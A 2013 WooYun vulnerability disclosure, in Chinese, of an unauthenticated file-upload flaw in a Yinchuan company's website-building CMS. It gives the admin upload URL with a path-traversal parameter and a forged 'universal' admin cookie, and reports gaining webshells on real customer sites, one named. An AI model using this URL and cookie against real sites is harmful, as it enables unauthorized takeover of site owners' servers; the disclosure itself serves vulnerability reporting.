当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034165

漏洞标题:银川迅雷网络有限公司客户网站通杀0day

相关厂商:银川迅雷网络有限公司

漏洞作者: 浅蓝

提交时间:2013-08-12 14:38

修复时间:2013-11-10 14:38

公开时间:2013-11-10 14:38

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

迅雷建站系统存在漏洞

详细说明:

官网:www.ycxl.net
Url:
http://www.***.com/admin/upfile.asp?folder=../upload&insert=wj
通用Cookie:
ASPSESSIONIDAQDBADDQ=CPLIPMADOGIGCLJFFHNGJABP; cmsname=admin; cmsid=1

漏洞证明:

官网:www.ycxl.net
Url:
http://www.***.com/admin/upfile.asp?folder=../upload&insert=wj
通用Cookie:
ASPSESSIONIDAQDBADDQ=CPLIPMADOGIGCLJFFHNGJABP; cmsname=admin; cmsid=1

1L.jpg

随便找一个案例 比如:http://www.nzwuye.com/

22222JCE}7[LXB.jpg

填入提交地址和cookie点击上传 显示成功

444444446.jpg

已成功获取webshell

5555555.jpg

同样填入提交地址和cookie

6666.jpg

照样获取webshell

修复方案:

不知道

版权声明:转载请注明来源 浅蓝@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝